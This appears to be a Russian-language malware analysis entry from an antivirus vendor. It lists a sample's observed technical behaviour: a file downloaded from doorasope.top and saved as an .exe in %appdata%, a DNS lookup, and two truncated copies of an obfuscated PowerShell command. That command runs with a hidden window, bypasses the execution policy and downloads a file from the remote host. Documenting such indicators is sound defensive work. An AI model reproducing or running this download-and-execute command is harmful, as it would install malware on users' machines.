Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^w^Ersh^E^l^L.e^xe -Exec^utIo^Npoli^cy^ bypA^sS -No^PR^O^FIle^ -Wi^n^d^oWst^yle ^h^idden^ ^(^nE^w-^o^bj^EcT sysTem^.nEt^.^WEB^C^LiENt)^.^DoW^NLo^a^d^fiLE^('http://www.doorasope...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PO^w^Ersh^E^l^L.e^xe -Exec^utIo^Npoli^cy^ bypA^sS -No^PR^O^FIle^ -Wi^n^d^oWst^yle ^h^idden^ ^(^nE^w-^o^bj^EcT sysTem^.nEt^.^WEB^C^LiENt)^.^DoW^NLo^a^d^fiLE^('http://www.doorasope...' (со скрытым окном)